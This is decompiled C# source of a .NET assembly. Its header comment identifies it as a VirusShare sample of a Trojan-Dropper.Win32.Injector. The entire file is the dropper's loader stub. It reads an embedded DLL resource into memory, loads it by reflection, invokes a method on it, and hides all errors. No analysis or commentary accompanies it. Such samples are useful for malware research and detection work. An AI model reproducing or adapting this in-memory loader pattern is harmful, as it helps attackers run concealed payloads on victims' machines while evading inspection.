// Decompiled with JetBrains decompiler // Type: program // Assembly: p3p2arcf, Version=4.12.1990.0, Culture=neutral, PublicKeyToken=null // MVID: 08CA09E7-85A3-4626-AC9B-26D79BD2D208 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Dropper.Win32.Injector.brzn-390d49825b8f0729344f976534742b524d9ce900514040facccd5c65f882cf11.exe using System; using System.IO; using System.Reflection; public static class program { public static void Main(string[] args) { try { Type type = Assembly.Load(program.ReadFully(Assembly.GetExecutingAssembly().GetManifestResourceStream("kfj5ggvz.dll"))).GetType("someClass"); type.GetMethod("myVoid").Invoke(Activator.CreateInstance(type), new object[0]); } catch (Exception ex) { } } public static byte[] ReadFully(Stream stream) { byte[] buffer = new byte[32768]; using (MemoryStream memoryStream = new MemoryStream()) { while (true) { int count = stream.Read(buffer, 0, buffer.Length); if (count > 0) memoryStream.Write(buffer, 0, count); else break; } return memoryStream.ToArray(); } } }